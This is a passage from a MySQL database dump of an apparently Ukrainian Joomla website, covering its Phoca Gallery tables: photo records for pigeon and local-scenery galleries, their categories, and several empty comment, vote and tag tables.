00:00:00',4,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','','','*'),(73,3,0,'Поштові','poshtovi','fotogaleri_golub/gpost_20200903_00064.jpg',1,NULL,'2020-09-03 17:03:27',11,'0','0',0,'',0,NULL,0,0,209230,1,1,0,'0000-00-00 00:00:00',5,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','','','*'),(74,3,0,'Поштові','poshtovi','fotogaleri_golub/gpost_20200903_00065.jpg',1,NULL,'2020-09-03 17:03:27',9,'0','0',0,'',0,NULL,0,0,196211,1,1,0,'0000-00-00 00:00:00',6,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','','','*'),(75,3,0,'Поштові','poshtovi','fotogaleri_golub/gpost_20200903_00067.jpg',1,NULL,'2020-09-03 17:03:27',14,'0','0',0,'',0,NULL,0,0,228251,1,1,0,'0000-00-00 00:00:00',7,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','','','*'),(76,3,0,'Поштові','poshtovi','fotogaleri_golub/gpost_20200903_00069.jpg',1,NULL,'2020-09-03 17:03:27',11,'0','0',0,'',0,NULL,0,0,200305,1,1,0,'0000-00-00 00:00:00',8,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','','','*'),(77,3,0,'Поштові','poshtovi','fotogaleri_golub/gpost_20200903_00070.jpg',1,NULL,'2020-09-03 17:03:27',10,'0','0',0,'',0,NULL,0,0,211002,1,1,0,'0000-00-00 00:00:00',9,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','','','*'),(78,3,0,'Поштові','poshtovi','fotogaleri_golub/gpost_20200903_00071.jpg',1,NULL,'2020-09-03 17:03:27',10,'0','0',0,'',0,NULL,0,0,213849,1,1,0,'0000-00-00 00:00:00',10,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','','','*'),(79,3,0,'Поштові','poshtovi','fotogaleri_golub/gpost_20200903_00073.jpg',1,NULL,'2020-09-03 17:03:27',8,'0','0',0,'',0,NULL,0,0,202547,1,1,0,'0000-00-00 00:00:00',11,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','','','*'),(80,3,0,'Поштові','poshtovi','fotogaleri_golub/gpost_20200903_00074.jpg',1,NULL,'2020-09-03 17:03:27',12,'0','0',0,'',0,NULL,0,0,211707,1,1,0,'0000-00-00 00:00:00',12,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','','','*'),(81,3,0,'Поштові','poshtovi','fotogaleri_golub/gpost_20200903_00075.jpg',1,NULL,'2020-09-03 17:03:27',11,'0','0',0,'',0,NULL,0,0,187467,1,1,0,'0000-00-00 00:00:00',13,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','','','*'),(82,3,0,'Поштові','poshtovi','fotogaleri_golub/gpost_20200903_00076.jpg',1,NULL,'2020-09-03 17:03:27',8,'0','0',0,'',0,NULL,0,0,248734,1,1,0,'0000-00-00 00:00:00',14,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','','','*'),(83,3,0,'Поштові','poshtovi','fotogaleri_golub/gpost_20200903_00077.jpg',1,NULL,'2020-09-03 17:03:27',7,'0','0',0,'',0,NULL,0,0,214778,1,1,0,'0000-00-00 00:00:00',15,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','','','*'),(84,3,0,'Поштові','poshtovi','fotogaleri_golub/gpost_20200903_00078.jpg',1,NULL,'2020-09-03 17:03:27',8,'0','0',0,'',0,NULL,0,0,214750,1,1,0,'0000-00-00 00:00:00',16,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','','','*'),(85,3,0,'Поштові','poshtovi','fotogaleri_golub/gpost_20200903_00086.jpg',1,NULL,'2020-09-03 17:03:27',10,'0','0',0,'',0,NULL,0,0,187490,1,1,0,'0000-00-00 00:00:00',17,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','','','*'),(86,3,0,'Поштові','poshtovi','fotogaleri_golub/gpost_20200903_00087.jpg',1,NULL,'2020-09-03 17:03:27',7,'0','0',0,'',0,NULL,0,0,219572,1,1,0,'0000-00-00 00:00:00',18,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','','','*'),(87,3,0,'Поштові','poshtovi','fotogaleri_golub/gpost_20200903_00088.jpg',1,NULL,'2020-09-03 17:03:27',7,'0','0',0,'',0,NULL,0,0,178840,1,1,0,'0000-00-00 00:00:00',19,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','','','*'),(88,3,0,'Поштові','poshtovi','fotogaleri_golub/gpost_20200903_00092.jpg',1,NULL,'2020-09-03 17:03:27',9,'0','0',0,'',0,NULL,0,0,278431,1,1,0,'0000-00-00 00:00:00',20,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','','','*'),(89,3,0,'Поштові','poshtovi','fotogaleri_golub/gpost_20200903_00093.jpg',1,NULL,'2020-09-03 17:03:27',8,'0','0',0,'',0,NULL,0,0,101190,1,1,0,'0000-00-00 00:00:00',21,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','','','*'),(90,3,0,'Поштові','poshtovi','fotogaleri_golub/gpost_20200903_00094.jpg',1,NULL,'2020-09-03 17:03:27',6,'0','0',0,'',0,NULL,0,0,269761,1,1,0,'0000-00-00 00:00:00',22,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','','','*'),(91,3,0,'Поштові','poshtovi','fotogaleri_golub/gpost_20200903_00095.jpg',1,NULL,'2020-09-03 17:03:27',6,'0','0',0,'',0,NULL,0,0,177036,1,1,0,'0000-00-00 00:00:00',23,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','','','*'),(92,3,0,'Поштові','poshtovi','fotogaleri_golub/gpost_20200903_00096.jpg',2,NULL,'2020-09-03 17:03:27',6,'0','0',0,'',0,NULL,0,0,125764,1,1,0,'0000-00-00 00:00:00',24,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','','','*'),(93,3,0,'Поштові','poshtovi','fotogaleri_golub/gpost_20200903_00097.jpg',1,NULL,'2020-09-03 17:03:27',6,'0','0',0,'',0,NULL,0,0,111069,1,1,0,'0000-00-00 00:00:00',25,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','','','*'),(94,3,0,'Поштові','poshtovi','fotogaleri_golub/gpost_20200903_00098.jpg',1,NULL,'2020-09-03 17:03:27',6,'0','0',0,'',0,NULL,0,0,134348,1,1,0,'0000-00-00 00:00:00',26,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','','','*'),(95,3,0,'Поштові','poshtovi','fotogaleri_golub/gpost_20200903_00099.jpg',1,NULL,'2020-09-03 17:03:27',6,'0','0',0,'',0,NULL,0,0,184678,1,1,0,'0000-00-00 00:00:00',27,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','','','*'),(96,4,0,'Молоді поштові білі','molodi-poshtovi-bili','fotogaleri_biligolub/gpost_20200903_00079.jpg',1,NULL,'2020-09-03 17:49:33',31,'0','0',0,'',0,NULL,0,0,223100,1,1,0,'0000-00-00 00:00:00',1,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','639,100,50','480,100,50','*'),(97,4,0,'Молоді поштові білі','molodi-poshtovi-bili','fotogaleri_biligolub/gpost_20200903_00080.jpg',1,NULL,'2020-09-03 17:49:33',10,'0','0',0,'',0,NULL,0,0,232735,1,1,0,'0000-00-00 00:00:00',2,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','639,100,50','480,100,50','*'),(98,4,0,'Молоді поштові білі','molodi-poshtovi-bili','fotogaleri_biligolub/gpost_20200903_00081.jpg',1,NULL,'2020-09-03 17:49:33',9,'0','0',0,'',0,NULL,0,0,230030,1,1,0,'0000-00-00 00:00:00',3,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','639,100,50','480,100,50','*'),(99,4,0,'Молоді поштові білі','molodi-poshtovi-bili','fotogaleri_biligolub/gpost_20200903_00083.jpg',1,NULL,'2020-09-03 17:49:33',10,'0','0',0,'',0,NULL,0,0,248026,1,1,0,'0000-00-00 00:00:00',4,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','639,100,50','480,100,50','*'),(100,4,0,'Молоді поштові білі','molodi-poshtovi-bili','fotogaleri_biligolub/gpost_20200903_00084.jpg',1,NULL,'2020-09-03 17:49:33',9,'0','0',0,'',0,NULL,0,0,200927,1,1,0,'0000-00-00 00:00:00',5,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','639,100,50','480,100,50','*'),(101,4,0,'Молоді поштові білі','molodi-poshtovi-bili','fotogaleri_biligolub/gpost_20200903_00089.jpg',1,NULL,'2020-09-03 17:49:33',10,'0','0',0,'',0,NULL,0,0,161153,1,1,0,'0000-00-00 00:00:00',6,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','640,100,50','319,100,50','*'),(102,4,0,'Молоді поштові білі','molodi-poshtovi-bili','fotogaleri_biligolub/gpost_20200903_00091.jpg',1,NULL,'2020-09-03 17:49:33',8,'0','0',0,'',0,NULL,0,0,167533,1,1,0,'0000-00-00 00:00:00',7,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','639,100,50','480,100,50','*'),(103,5,0,'12_1','12-1','fotogaleri_golubpost/12_1.jpg',1,NULL,'2020-12-15 19:18:06',8,'0','0',0,'',0,NULL,0,0,142148,1,1,0,'0000-00-00 00:00:00',1,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','562,100,50','480,100,50','*'),(104,5,0,'12_2','12-2','fotogaleri_golubpost/12_2.jpg',2,NULL,'2020-12-15 19:18:06',5,'0','0',0,'',0,NULL,0,0,130273,1,1,0,'0000-00-00 00:00:00',2,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','439,100,50','480,100,50','*'),(105,5,0,'12_3','12-3','fotogaleri_golubpost/12_3.jpg',2,NULL,'2020-12-15 19:18:06',1,'0','0',0,'',0,NULL,0,0,131188,1,1,0,'0000-00-00 00:00:00',3,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','476,100,50','480,100,50','*'),(106,5,0,'12_4','12-4','fotogaleri_golubpost/12_4.jpg',2,NULL,'2020-12-15 19:18:06',1,'0','0',0,'',0,NULL,0,0,196350,1,1,0,'0000-00-00 00:00:00',4,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','471,100,50','480,100,50','*'),(107,5,0,'mvimg_20201215_131030','mvimg-20201215-131030','fotogaleri_golubpost/mvimg_20201215_131030.jpg',1,NULL,'2020-12-15 19:18:06',1,'0','0',0,'',0,NULL,0,0,1479366,1,1,0,'0000-00-00 00:00:00',5,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','552,100,50','480,100,50','*');
/*!40000 ALTER TABLE `fw3gt_phocagallery` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_phocagallery_categories`
--

DROP TABLE IF EXISTS `fw3gt_phocagallery_categories`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_phocagallery_categories` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `parent_id` int(11) NOT NULL DEFAULT '0',
  `owner_id` int(11) NOT NULL DEFAULT '0',
  `image_id` int(11) NOT NULL DEFAULT '0',
  `title` varchar(255) NOT NULL DEFAULT '',
  `name` varchar(255) NOT NULL DEFAULT '',
  `alias` varchar(255) NOT NULL DEFAULT '',
  `image` varchar(255) NOT NULL DEFAULT '',
  `section` varchar(50) NOT NULL DEFAULT '',
  `image_position` varchar(30) NOT NULL DEFAULT '',
  `description` text,
  `date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `approved` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `editor` varchar(50) DEFAULT NULL,
  `ordering` int(11) NOT NULL DEFAULT '0',
  `access` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `count` int(11) NOT NULL DEFAULT '0',
  `hits` int(11) NOT NULL DEFAULT '0',
  `accessuserid` text,
  `uploaduserid` text,
  `deleteuserid` text,
  `userfolder` text,
  `latitude` varchar(20) NOT NULL DEFAULT '',
  `longitude` varchar(20) NOT NULL DEFAULT '',
  `zoom` int(3) NOT NULL DEFAULT '0',
  `geotitle` varchar(255) NOT NULL DEFAULT '',
  `extid` varchar(255) NOT NULL DEFAULT '',
  `exta` varchar(255) NOT NULL DEFAULT '',
  `extu` varchar(255) NOT NULL DEFAULT '',
  `extauth` varchar(255) NOT NULL DEFAULT '',
  `imgurclient` varchar(255) NOT NULL DEFAULT '',
  `imguralbum` varchar(255) NOT NULL DEFAULT '',
  `extfbuid` int(11) NOT NULL DEFAULT '0',
  `extfbcatid` varchar(255) NOT NULL DEFAULT '',
  `params` text,
  `metakey` text,
  `metadesc` text,
  `metadata` text,
  `language` char(7) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  KEY `cat_idx` (`section`,`published`,`access`),
  KEY `idx_access` (`access`),
  KEY `idx_checkout` (`checked_out`)
) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_phocagallery_categories`
--

LOCK TABLES `fw3gt_phocagallery_categories` WRITE;
/*!40000 ALTER TABLE `fw3gt_phocagallery_categories` DISABLE KEYS */;
INSERT INTO `fw3gt_phocagallery_categories` VALUES (1,0,0,0,'Фото Малинщини','','foto-malynshchyny','','','','<p><img src=\"https://malehus.in.ua/images/stories/fotogaleri/malyn_nash000021.jpg\" alt=\"\" class=\"fr-dii fr-fin\"></p>','2020-09-02 12:12:14',1,1,0,'0000-00-00 00:00:00',NULL,1,1,0,127,'0','0','0','','','',0,'','','','','','','',0,'',NULL,'','',NULL,'*'),(3,0,0,0,'Поштові голуби','','pochtovye-golubi','','','','	<p><img src=\"https://malehus.in.ua/images/stories/gpost_20200903_00093.jpg\" alt=\"\" class=\"fr-dii fr-fin\"></p>','2020-09-03 00:00:00',1,1,0,'0000-00-00 00:00:00',NULL,2,1,0,240,'0','0','0','fotogaleri_golub','','',0,'','','','','','','',0,'',NULL,'','',NULL,'*'),(4,0,0,0,'Поштові білі','','poshtovi-bili','','','','<p><img src=\"https://malehus.in.ua/images/stories/golub_log_1.jpg\" alt=\"\" class=\"fr-fin\" width=\"519\"></p>','2020-09-03 00:00:00',1,1,0,'0000-00-00 00:00:00',NULL,3,1,0,121,'0','0','0','','','',0,'','','','','','','',0,'',NULL,'','',NULL,'*'),(5,0,0,0,'Поштові голуби_грудень 2020','','poshtovi-holubyhruden-2020','','','','				<p><img src=\"https://malehus.in.ua/images/stories/12_6.jpg\" alt=\"\" class=\"fr-dii fr-fin\"></p>','2020-12-15 00:00:00',1,1,0,'0000-00-00 00:00:00',NULL,1,1,0,0,'0','0','0','fotogaleri_golubpost','','',0,'','','','','','','',0,'',NULL,'','',NULL,'*');
/*!40000 ALTER TABLE `fw3gt_phocagallery_categories` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_phocagallery_comments`
--

DROP TABLE IF EXISTS `fw3gt_phocagallery_comments`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_phocagallery_comments` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `catid` int(11) NOT NULL DEFAULT '0',
  `userid` int(11) NOT NULL DEFAULT '0',
  `date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `title` varchar(255) NOT NULL DEFAULT '',
  `alias` varchar(255) NOT NULL DEFAULT '',
  `comment` text,
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `params` text,
  `language` char(7) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_phocagallery_comments`
--

LOCK TABLES `fw3gt_phocagallery_comments` WRITE;
/*!40000 ALTER TABLE `fw3gt_phocagallery_comments` DISABLE KEYS */;
/*!40000 ALTER TABLE `fw3gt_phocagallery_comments` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_phocagallery_fb_users`
--

DROP TABLE IF EXISTS `fw3gt_phocagallery_fb_users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_phocagallery_fb_users` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `appid` varchar(255) NOT NULL DEFAULT '',
  `appsid` varchar(255) NOT NULL DEFAULT '',
  `uid` varchar(255) NOT NULL DEFAULT '',
  `name` varchar(255) NOT NULL DEFAULT '',
  `link` varchar(255) NOT NULL DEFAULT '',
  `secret` varchar(255) NOT NULL DEFAULT '',
  `base_domain` varchar(255) NOT NULL DEFAULT '',
  `expires` varchar(100) NOT NULL DEFAULT '',
  `session_key` text,
  `access_token` text,
  `sig` text,
  `fanpageid` varchar(255) NOT NULL DEFAULT '',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `comments` text,
  `params` text,
  `language` char(7) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_phocagallery_fb_users`
--

LOCK TABLES `fw3gt_phocagallery_fb_users` WRITE;
/*!40000 ALTER TABLE `fw3gt_phocagallery_fb_users` DISABLE KEYS */;
/*!40000 ALTER TABLE `fw3gt_phocagallery_fb_users` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_phocagallery_img_comments`
--

DROP TABLE IF EXISTS `fw3gt_phocagallery_img_comments`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_phocagallery_img_comments` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `imgid` int(11) NOT NULL DEFAULT '0',
  `userid` int(11) NOT NULL DEFAULT '0',
  `date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `title` varchar(255) NOT NULL DEFAULT '',
  `alias` varchar(255) NOT NULL DEFAULT '',
  `comment` text,
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `params` text,
  `language` char(7) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_phocagallery_img_comments`
--

LOCK TABLES `fw3gt_phocagallery_img_comments` WRITE;
/*!40000 ALTER TABLE `fw3gt_phocagallery_img_comments` DISABLE KEYS */;
/*!40000 ALTER TABLE `fw3gt_phocagallery_img_comments` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_phocagallery_img_votes`
--

DROP TABLE IF EXISTS `fw3gt_phocagallery_img_votes`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_phocagallery_img_votes` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `imgid` int(11) NOT NULL DEFAULT '0',
  `userid` int(11) NOT NULL DEFAULT '0',
  `date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `rating` tinyint(1) NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `params` text,
  `language` char(7) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_phocagallery_img_votes`
--

LOCK TABLES `fw3gt_phocagallery_img_votes` WRITE;
/*!40000 ALTER TABLE `fw3gt_phocagallery_img_votes` DISABLE KEYS */;
/*!40000 ALTER TABLE `fw3gt_phocagallery_img_votes` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_phocagallery_img_votes_statistics`
--

DROP TABLE IF EXISTS `fw3gt_phocagallery_img_votes_statistics`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_phocagallery_img_votes_statistics` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `imgid` int(11) NOT NULL DEFAULT '0',
  `count` int(11) NOT NULL DEFAULT '0',
  `average` float(8,6) NOT NULL DEFAULT '0.000000',
  `language` char(7) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_phocagallery_img_votes_statistics`
--

LOCK TABLES `fw3gt_phocagallery_img_votes_statistics` WRITE;
/*!40000 ALTER TABLE `fw3gt_phocagallery_img_votes_statistics` DISABLE KEYS */;
/*!40000 ALTER TABLE `fw3gt_phocagallery_img_votes_statistics` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_phocagallery_styles`
--

DROP TABLE IF EXISTS `fw3gt_phocagallery_styles`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_phocagallery_styles` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `title` varchar(255) NOT NULL DEFAULT '',
  `alias` varchar(255) NOT NULL DEFAULT '',
  `filename` varchar(255) NOT NULL DEFAULT '',
  `menulink` text,
  `type` tinyint(1) NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `params` text,
  `language` char(7) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_phocagallery_styles`
--

LOCK TABLES `fw3gt_phocagallery_styles` WRITE;
/*!40000 ALTER TABLE `fw3gt_phocagallery_styles` DISABLE KEYS */;
INSERT INTO `fw3gt_phocagallery_styles` VALUES (1,'Phocagallery','phocagallery','phocagallery.css','',1,1,0,'0000-00-00 00:00:00',1,NULL,'*'),(2,'Rating','','rating.css',NULL,1,1,0,'0000-00-00 00:00:00',2,NULL,'*'),(3,'Default','','default.css',NULL,2,1,0,'0000-00-00 00:00:00',3,NULL,'*');
/*!40000 ALTER TABLE `fw3gt_phocagallery_styles` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_phocagallery_tags`
--

DROP TABLE IF EXISTS `fw3gt_phocagallery_tags`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_phocagallery_tags` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `title` varchar(255) NOT NULL DEFAULT '',
  `alias` varchar(255) NOT NULL DEFAULT '',
  `link_cat` int(11) NOT NULL DEFAULT '0',
  `link_ext` varchar(255) NOT NULL DEFAULT '',
  `description` text,
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `params` text,
  `language` char(7) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_phocagallery_tags`
--

LOCK TABLES `fw3gt_phocagallery_tags` WRITE;
/*!40000 ALTER TABLE `fw3gt_phocagallery_tags` DISABLE KEYS */;
/*!40000 ALTER TABLE `fw3gt_phocagallery_tags` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_phocagallery_tags_ref`
--

DROP TABLE IF EXISTS `fw3gt_phocagallery_tags_ref`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_phocagallery_tags_ref` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `imgid` int(11) NOT NULL DEFAULT '0',
  `tagid` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `id` (`id`),
  UNIQUE KEY `i_imgid` (`imgid`,`tagid`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_phocagallery_tags_ref`
--

LOCK TABLES `fw3gt_phocagallery_tags_ref` WRITE;
/*!40000 ALTER TABLE `fw3gt_phocagallery_tags_ref` DISABLE KEYS */;
/*!40000 ALTER TABLE `fw3gt_phocagallery_tags_ref` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_phocagallery_user`
--

DROP TABLE IF EXISTS `fw3gt_phocagallery_user`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_phocagallery_user` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `userid` int(11) NOT NULL DEFAULT '0',
  `avatar` varchar(40) NOT NULL DEFAULT '',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `approved` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `params` text,
  `language` char(7) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  KEY `userid` (`userid`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_phocagallery_user`
--

LOCK TABLES `fw3gt_phocagallery_user` WRITE;
/*!40000 ALTER TABLE `fw3gt_phocagallery_user` DISABLE KEYS */;
/*!40000 ALTER TABLE `fw3gt_phocagallery_user` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_phocagallery_votes`
--

DROP TABLE IF EXISTS `fw3gt_phocagallery_votes`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_phocagallery_votes` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `catid` int(11) NOT NULL DEFAULT '0',
  `userid` int(11) NOT NULL DEFAULT '0',
  `date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `rating` tinyint(1) NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `params` text,
  `language` char(7) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_phocagallery_votes`
--

LOCK TABLES `fw3gt_phocagallery_votes` WRITE;
/*!40000 ALTER TABLE `fw3gt_phocagallery_votes` DISABLE KEYS */;
/*!40000 ALTER TABLE `fw3gt_phocagallery_votes` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_phocagallery_votes_statistics`
--

DROP TABLE IF EXISTS `fw3gt_phocagallery_votes_statistics`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_phocagallery_votes_statistics` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `catid` int(11) NOT NULL DEFAULT '0',
  `count` int(11) NOT NULL DEFAULT '0',
  `average` float(8,6) NOT NULL DEFAULT '0.000000',
  `language` char(7) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_phocagallery_votes_statistics`
--

LOCK TABLES `fw3gt_phocagallery_votes_statistics` WRITE;
/*!40000 ALTER TABLE `fw3gt_phocagallery_votes_statistics` DISABLE KEYS */;
/*!40000 ALTER TABLE `fw3gt_phocagallery_votes_statistics` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_plg_system_adminexile`
--

DROP TABLE IF EXISTS `fw3gt_plg_system_adminexile`;
